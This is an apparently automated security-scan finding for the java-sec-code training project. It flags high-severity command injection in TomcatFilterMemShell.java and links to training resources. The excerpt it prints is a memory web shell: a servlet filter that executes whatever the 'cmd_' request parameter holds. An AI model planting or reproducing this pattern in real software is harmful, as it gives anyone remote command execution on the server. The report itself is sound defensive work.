Code Security Finding

This finding was first detected on 2024-02-07 06:59pm GMT and is still present in the last scan performed on 2024-02-07 06:58pm GMT:

Severity	Vulnerability Type	CWE	File	Data Flows
High	Command Injection	CWE-78	TomcatFilterMemShell.java:97	1
Vulnerable Code java-sec-code/src/main/java/org/joychou/config/TomcatFilterMemShell.java Lines 92 to 97 in 5c68d09 @Override public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException { String cmd; if ((cmd = servletRequest.getParameter("cmd_")) != null) { Process process = Runtime.getRuntime().exec(cmd); 1 Data Flow/s detected java-sec-code/src/main/java/org/joychou/config/TomcatFilterMemShell.java Line 96 in 5c68d09 if ((cmd = servletRequest.getParameter("cmd_")) != null) { Secure Code Warrior Training Material ● Training    ▪ Secure Code Warrior Command Injection Training ● Videos    ▪ Secure Code Warrior Command Injection Video ● Further Reading    ▪ OWASP testing for Command Injection    ▪ OWASP Command Injection 🏴 Suppress Finding ... as False Alarm ... as Acceptable Risk